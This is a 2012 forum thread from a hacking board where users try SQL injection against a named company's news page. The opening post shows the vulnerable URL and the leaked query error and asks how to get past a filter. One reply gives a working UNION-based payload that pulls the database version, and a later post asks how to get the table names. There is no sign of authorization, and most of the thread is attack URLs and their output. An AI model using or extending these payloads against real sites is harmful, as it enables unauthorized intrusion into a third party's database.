Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
how to inject this bug?
Posted by: annen
Date: April 18, 2012 05:57AM

http://www.clearviewgroup.ca/news.php?newsid=16


http://www.clearviewgroup.ca/news.php?newsid=16-- work well
http://www.clearviewgroup.ca/news.php?newsid=-16-- error in

http://www.clearviewgroup.ca/news.php?newsid=16 order by 1--
"
INVALID SQL: 1054 : Unknown column '20order' in 'where clause'
SQL QUERY FAILURE: SELECT title, postdate, content FROM ht_news WHERE id = 16%20order%20by%201--
"
how to bypass it ?

Options: ReplyQuote
Re: how to inject this bug?
Posted by: Razor4x
Date: April 18, 2012 12:17PM

http://www.clearviewgroup.ca/news.php?newsid=(-16)UNION(SELECT+version(),2,3)--

5.5.14

thanks to m4rkz...

Options: ReplyQuote
Re: how to inject this bug?
Posted by: Nerder
Date: April 18, 2012 05:45PM

Siiick... this WAF was very hard! I try to bypass it for on day!!!

Options: ReplyQuote
Re: how to inject this bug?
Posted by: annen
Date: April 18, 2012 09:21PM

Sorry! I cann't get table_names......

Options: ReplyQuote


Go to: Forum ListMessage ListSearchLog In
Sorry, only registered users may post in this forum.
Click here to login

Falling Rock Networks

sla.ckers.org RSS feed
Board haX0r3d together by ha.ckers.org, forshizzle. *